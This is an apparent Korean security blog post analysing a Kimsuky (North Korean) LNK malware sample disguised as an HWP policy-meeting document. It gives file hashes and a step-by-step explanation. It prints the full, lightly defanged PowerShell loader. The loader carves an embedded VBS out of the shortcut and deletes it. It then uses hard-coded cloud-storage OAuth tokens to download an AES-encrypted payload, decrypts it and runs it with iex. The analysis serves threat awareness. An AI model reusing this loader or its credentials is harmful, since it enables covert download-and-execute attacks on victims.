북한 해킹 조직 김수키(Kimsuky) 에서 만든 악성코드-한중 북중 안보현안 비공개 정책간담회 계획.lnk(2024.8.20)

오늘은 북한 해킹 조직 김수키(Kimsuky) 에서 만든 악성코드-한중 북중 안보현안 비공개 정책간담회 계획.lnk(2024.8.20)에 대해 우마무스메 박신 주의(バクシン主義) 정신으로?? 알아보겠습니다.
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 표적 공격으로 하는 북한의 해킹 단체 Thallium, APT 37과 관련된 해킹 단체이며 Kimsuky(김수키)에서 만든 것이며 오늘은 다루는 악성코드의 해쉬값은 다음과 같습니다.
파일명: 한중 북중 안보현안 비공개 정책간담회 계획.lnk
사이즈:1.05 MB
MD5:32e828282dbe16073293dacc17f0598c
SHA-1:5b9ade0255a0f49b7db9fa8bb390864155a7b4f2
SHA-256:6b660666f031843a36225e791f6564983c2c8cabf85d2216f0617702a978c838
먼저 악성코드는 한글과 컴퓨터를 확장자인 HWP 인 것처럼 위장하는 것이 특징이며 Powershell 코드는 다음과 같습니다.

악성코드 에 포함된 powershell 코드

 

Strin(g)Data
{
    names(t)ring: Type: Text Document
    Size: 5(.)23 KB
    Date modif(i)ed: 01/02/2020 11:23
    relativepat(h): not present
    workingdir: not present
    commandlinearguments:
    /c powershell -window(s)tyle hidden -nop -NoProfile -NonInter
    active  -c "($)tmp = '%temp%';$lnkpath = Get-ChildItem *.lnk
    ;foreach ($path i(n) $lnkpath) ({) if ($p(a)th.length -eq 0x
    0010F27C) { $lnkpath = $pa(t)h;}}foreach ($item (i)n $l(n)kp
    ath) { $(l)nkpath = $item.Name;}$Inpu(t)Stream = New-Object 
    System(.)IO.FileStream($lnkpath, [I
    O.FileMode]::Open, [System.IO.FileAccess]::Re(a)d);$file=N(e)w-
    Object Byte[]($InputStream
    (.)length);$len=$InputStream(.)Read($file,0,$file(.)Length
    );$InputStream.D(i)spose();write
    -host \"read(f)ileend\";$p(a)th = $lnkpath.substri(n)g(0,
    $lnkpath.leng(t)h-4);$path1 = '%t
    emp%\(t)mp' + (Get(-)Random) + '(.)vbs';$len1 =    10572(
    4)8;$len2 =    111049(6);$len3 = 
    1110(4)96;$temp = New-Object By(t)e[]($len2-$(l)en1);writ
    (e)-host \"ex(e)start\";for($i=$l(e)
    n1; $i -lt ($)len2; $i++) { $(t)emp[$i-$len1] = $file[$i]};s
    (c) $path ([byte[]]$(t)emp) -Encoding Byte;wr(i)te-host \"exeen(d)\";$tem
    p = New-Objec(t) Byte[]($file.Length-($)len3);for($i=$(l)en3; $i -lt $fil
    e(.)Length; $i++) { $t(e)mp[$i-$len3] = $f(i)le[$i]}; $encData_b64 = Star
    t-P(r)ocess -FilePa(t)h $path;[System(.)IO.File]::Delet(e)($lnkpath);F(u)
    nction AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $I
    nput(S)tream = New-Object System.IO(.)MemoryStream(,$bytes);$OutputStream
    = Ne(w)-Object System.IO.M(e)moryStream;$Salt = New-Object Byte[](32);$By
    tesRead = $InputStream.Re(a0d($Salt, 0, $Salt.Length);if ( $BytesRead -ne
    $Salt.Length ) { exit;} $PBKD(F)2 = New-Object System.Security.Cr(y)ptogr
    aphy.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);($)A
    ESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.Ae(s)
    Managed;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-
    (O)bject System.Security.Cryptography.Cr(y)ptoStream($InputStream, $Dec, 
    [System.Security.Cryptography.Cryp(t)oStreamMode]::Read);$CryptoStream.Co
    pyTo($OutputStream);$OutputStream.Dispose();retu(r)n $OutputStream.ToArra
    y();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp(2)7gytekx9jfq
    \";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZP(T)YB-BVIH
    5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$r(
    e)freshToken;client_id=$clientID;client_secret=$clientSe(c)ret};$tokenEnd
    point = \"hxxps://api.dr0pb0xapi(.)com/oauth2/token\";$response = Invoke-
    (R)estMethod -Uri $tokenEndpoint -Metho(d) Post -Body $body;if ($response
    (.)access_token) {$accessToken = $re(s)ponse.access_token;}$downloadUrl =
    \"hxxs://content(.)dr0pb0xapi(.)com/2/files/download\";$remoteFilePath = 
    \"/step5/ps(.)bin\";$request = [System.Net.Htt(p)WebRequest]::Create($dow
    (n)loadUrl);$request(.)Method = \"POST\";$request.Heade(r)s.Add(\"Authori
    z(a)tion\", \"B(e)arer $accessToken\");$request.He(a)ders.Add(\"Dr0pb0x-A
    P(I)-Arg\", '{\"pat(h)\": \"' + $remoteFile(P)ath + '\"}');$resp(o)nse = 
    $request.G(e)tResponse();$rece(i)veStream = $respons(e).GetResponseStream
    ();$pas(s) = \"pa55w(0)rd\";if ($re(c)eiveStream -ne $null) {$stream(R)ea
    der = New-O(b)ject System.IO.StreamReader($receiveStrea(m));$m(e)moryStre
    am = New-Object System.IO.MemoryStream;$buffer = New-Object byt(e)[] 1024
    ;$read = 0;do { $read = $receiveStream(.)Read($buffer, 0(,) $buffer.Lengt
    h);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc(_)by
    tes = $memorySt(r)eam.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes
    -pass $pass;$n(e)wString = [System(.)Text.Encoding]::UTF8(.)GetString($de
    c_byt(e)s);iex $newString;$memo(r)yStream.Close();$str(e)amReader.Close()
    ;};$recei(v)eStream.Close();$response.Clo(s)e();"
    iconlocation: (.)\8(.)hwp
	
}

악성코드 분석

해당 악성코드는 PowerShell 스크립트 악성 행위를 하려고 준비된 녀석입니다. 
1.(.)lnk 파일 검색 및 읽기
Get-ChildItem (.)lnk 명령어를 통해 현재 디렉터리에 있는 모든 (.)lnk 파일을 검색
검색된. lnk 파일 중 크기가 0x0(0)10F 27C(16,9(1)6,668 바이트)인 파일을 선택 
2.lnk 파일의 바이너리 데이터를 읽어들임
.lnk 파일을 열고 파일 내용을 바이트 배열로 읽어들임 이는 추후 데이터를 조작하기 위한 준비 과정
3.바이너리 데이터 조작 및 실행 가능한 파일 생성
$len1,$len2,$len3는 특정 바이트 위치를 나타내면서 해당 위치의 데이터를 추출
.lnk 파일에서 특정 범위의 데이터를 선택해 새로운 파일로 저장
4. AES 암호화 복호화 함수
함수는 AES 암호화된 데이터를 복호화하는 기능을 수행
패스워드(pa55w0rd)와 솔트 값을 기반으로 암호화 키와 초기화 벡터(IV)를 생성하고 암호화된 데이터를 복호화하여 원래의 바이너리 데이터로 변환
5. 드롭박스 API를 이용한 외부 통신
드롭박스 API를 통해 OAuth2 인증을 수행하고 액세스 토큰을 확보
해당 액세스 토큰을 이용해 드롭박스에서 파일을 다운로드하는 데 사용

악성코드 한중 북중 안보현안 비공개 정책간담회 계획 한글과 컴퓨터 파일 생성

6.드롭박스에서 파일 다운로드 및 복호화
드롭박스에서 특정 파일(ps(.)bin)을 다운로드 하고 AESDecrypt 함수를 사용해 복호화
복호화된 데이터는 텍스트 형식으로 변환되며 iex 명령어를 통해 실행
iex 는 문자열을 코드로 실행하는 명령어 악성 코드가 직접 실행되는 지점
일단 제목이 한중 북중 안보현안 비공개 정책간담회 계획.lnk인것을 보니 대충 대북관계자 분들을 타겟으로 한 것이 아닐까 생각이 됩니다. 글 내용은 인터넷에서 검색할 수 있는 파일을 그냥 복사 붙여 넣고 일부를 수정한 것이 아닐까 생각을 됩니다. 내용을 다 읽지 않아도 감이 온다는….
아무튼, 기본적인 보안 수칙을 잘 지키는 것이 안전하게 컴퓨터를 사용하는 방법일 것입니다.